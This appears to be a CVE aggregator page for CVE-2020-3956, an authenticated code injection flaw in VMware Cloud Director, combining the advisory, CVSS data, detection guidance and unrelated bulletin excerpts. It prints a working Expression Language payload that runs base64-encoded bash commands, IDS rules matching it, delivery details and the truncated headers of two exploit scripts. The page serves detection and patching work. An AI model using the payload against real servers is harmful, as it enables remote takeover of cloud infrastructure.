CVE-2020-3956
published 2020-05-20CVE-2020-3956: VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading…
PriorityP273high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
21.10%
97.3th percentile
VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading to a code injection vulnerability. An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vmware | vcloud_director | >= 10.0.0.0 < 10.0.0.2 | 10.0.0.2 |
| vmware | vcloud_director | >= 9.1.0.0 < 9.1.0.4 | 9.1.0.4 |
| vmware | vcloud_director | >= 9.5.0.0 < 9.5.0.6 | 9.5.0.6 |
| vmware | vcloud_director | >= 9.7.0.0 < 9.7.0.5 | 9.7.0.5 |
Detection & IOCsextracted from sources · hover to see the quote
command${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}↗
cookievcloud_jwt=
bytes
|3a|Host|3e 24 7b|
bytes
.getDeclaredConstructors|28 29 5b|
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible VMware Cloud Director RCE Attempt (CVE-2020-3956)"; flow:established,to_server; flowbits:set,ET.20203956; http.method; content:"PUT"; http.cookie; content:"vcloud_jwt="; startswith; http.request_body; content:"|3a|Host|3e 24 7b|"; content:".getDeclaredConstructors|28 29 5b|"; distance:0; fast_pattern; reference:url,citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/; classtype:attempted-admin; sid:2030240; rev:2; metadata:affected_product VMware, attack_target Server, created_at 2020_06_02, cve CVE_2020_3956, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, updated_at 2024_03_14;)
snort
alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Possible Successful VMware Cloud Director RCE Attempt (CVE-2020-3956)"; flow:established,to_client; flowbits:isset,ET.20203956; http.stat_code; content:"400"; http.response_body; content:"<Error"; content:"has|20|invalid|20|length|20|for"; fast_pattern; reference:url,citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/; classtype:attempted-admin; sid:2030241; rev:3; metadata:affected_product VMware, attack_target Server, created_at 2020_06_02, cve CVE_2020_3956, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14;)
- →Exploit is delivered via HTTP PUT request to the vCloud Director admin API email settings endpoint, injecting a malicious Expression Language payload as the SMTP host name value. ↗
- →Requests carry the 'vcloud_jwt' session cookie and 'x-vcloud-authorization' header; monitor for PUT requests to /api/admin/ paths bearing these headers alongside EL injection patterns. ↗
- →A successful exploitation attempt can be detected by a 400 HTTP response containing '<Error' and the string 'has invalid length for' in the response body, paired with the ET.20203956 flowbit being set.
- →The exploit can be triggered through the HTML5-based UI, Flex-based UI, the API Explorer interface, and direct API access — monitor all four attack surfaces. ↗
- →The exploit uses base64-encoded commands piped through bash to evade simple string matching; look for base64 decode patterns in HTTP request bodies alongside the EL injection template. ↗
- ·The exploit requires valid authenticated credentials; unauthenticated exploitation is not possible. The threat actor must be an authenticated user of the VMware Cloud Director instance. ↗
- ·The Snort rules use flowbits (ET.20203956) to correlate inbound exploit attempts with outbound error responses; both rules (sid:2030240 and sid:2030241) must be active together for full detection coverage.
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6m5g-75wx-jxgj: VMware Cloud Director 10
ghsa_unreviewed·2022-05-24
CVE-2020-3956 [MEDIUM] CWE-74 GHSA-6m5g-75wx-jxgj: VMware Cloud Director 10
VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading to a code injection vulnerability. An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.
VMware
VMware Cloud Director updates address Code Injection Vulnerability (CVE-2020-3956)
vendor_vmware·2020-05-19·CVSS 8.8
CVE-2020-3956 [HIGH] VMware Cloud Director updates address Code Injection Vulnerability (CVE-2020-3956)
VMSA-2020-0010: VMware Cloud Director updates address Code Injection Vulnerability (CVE-2020-3956)
VMware Cloud Director does not properly handle input leading to a code injection vulnerability. VMware has evaluated the severity of this issue to be in the Imporant severity range with a maximum CVSSv3 base score of 8.8.
CVEs: CVE-2020-3956
Suricata
ET EXPLOIT Possible Successful VMware Cloud Director RCE Attempt (CVE-2020-3956)
suricata·2020-06-02·CVSS 8.8
CVE-2020-3956 [HIGH] ET EXPLOIT Possible Successful VMware Cloud Director RCE Attempt (CVE-2020-3956)
ET EXPLOIT Possible Successful VMware Cloud Director RCE Attempt (CVE-2020-3956)
Rule: alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Possible Successful VMware Cloud Director RCE Attempt (CVE-2020-3956)"; flow:established,to_client; flowbits:isset,ET.20203956; http.stat_code; content:"400"; http.response_body; content:"<Error"; content:"has|20|invalid|20|length|20|for"; fast_pattern; reference:url,citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/; classtype:attempted-admin; sid:2030241; rev:3; metadata:affected_product VMware, attack_target Server, created_at 2020_06_02, cve CVE_2020_3956, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, upd
Suricata
ET EXPLOIT Possible VMware Cloud Director RCE Attempt (CVE-2020-3956)
suricata·2020-06-02·CVSS 8.8
CVE-2020-3956 [HIGH] ET EXPLOIT Possible VMware Cloud Director RCE Attempt (CVE-2020-3956)
ET EXPLOIT Possible VMware Cloud Director RCE Attempt (CVE-2020-3956)
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible VMware Cloud Director RCE Attempt (CVE-2020-3956)"; flow:established,to_server; flowbits:set,ET.20203956; http.method; content:"PUT"; http.cookie; content:"vcloud_jwt="; startswith; http.request_body; content:"|3a|Host|3e 24 7b|"; content:".getDeclaredConstructors|28 29 5b|"; distance:0; fast_pattern; reference:url,citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/; classtype:attempted-admin; sid:2030240; rev:2; metadata:affected_product VMware, attack_target Server, created_at 2020_06_02, cve CVE_2020_3956, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, upd
Exploit-DB
VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
exploitdb·2020-06-04·CVSS 8.8
CVE-2020-3956 [HIGH] VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
---
# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
# Exploit Author: Tomas Melicher
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
# Date: 2020-05-24
# Vendor Homepage: https://www.vmware.com/
# Software Link: https://www.vmware.com/products/cloud-director.html
# Tested On: vCloud Director 9.7.0.15498291
# Vulnerability Description:
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
#!/usr/bin/python
import argparse # pip install argparse
import base64, os, re, requests, sys
if sys.vers
Exploit-DB
vCloud Director 9.7.0.15498291 - Remote Code Execution
exploitdb·2020-06-02·CVSS 8.8
CVE-2020-3956 [HIGH] vCloud Director 9.7.0.15498291 - Remote Code Execution
vCloud Director 9.7.0.15498291 - Remote Code Execution
---
#!/usr/bin/python
# Exploit Title: vCloud Director - Remote Code Execution
# Exploit Author: Tomas Melicher
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
# Date: 2020-05-24
# Vendor Homepage: https://www.vmware.com/
# Software Link: https://www.vmware.com/products/cloud-director.html
# Tested On: vCloud Director 9.7.0.15498291
# Vulnerability Description:
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
import argparse # pip install argparse
import base64, os, re, requests, sys
if sys.version_info >= (3, 0):
from urlli
Checkpoint
8th June – Threat Intelligence Bulletin
blogs_checkpoint·2020-06-08·CVSS 9.8
CVE-2019-19781 [CRITICAL] 8th June – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 8th June – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 8th June 2020, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Westech , a US military missile contractor, has been hit by the Maze ransomware after threat actors compromised its network and stole confidential documents from it. It is suspected that the hackers are of Russian origin, and that they may attempt to sell the stolen data to a foreign state.
Check Point SandBlast and Anti-
Checkpoint
25th May – Threat Intelligence Bulletin
blogs_checkpoint·2020-05-25
CVE-2020-0915 25th May – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 25th May – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 25th May 2020, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Thousands of Israeli websites have been defaced in an Anti-Israeli Campaign carried out by the “Hacker of Savior” group. All websites were hosted on a local Israeli hosting company called uPress, and the attackers centrally exploited a vulnerability in a WordPress plugin to publish an anti-Israeli message on the websites’
http://packetstormsecurity.com/files/157909/vCloud-Director-9.7.0.15498291-Remote-Code-Execution.htmlhttps://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/https://github.com/aaronsvk/CVE-2020-3956https://www.vmware.com/security/advisories/VMSA-2020-0010.htmlhttp://packetstormsecurity.com/files/157909/vCloud-Director-9.7.0.15498291-Remote-Code-Execution.htmlhttps://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/https://github.com/aaronsvk/CVE-2020-3956https://www.vmware.com/security/advisories/VMSA-2020-0010.html
2020-05-20
Published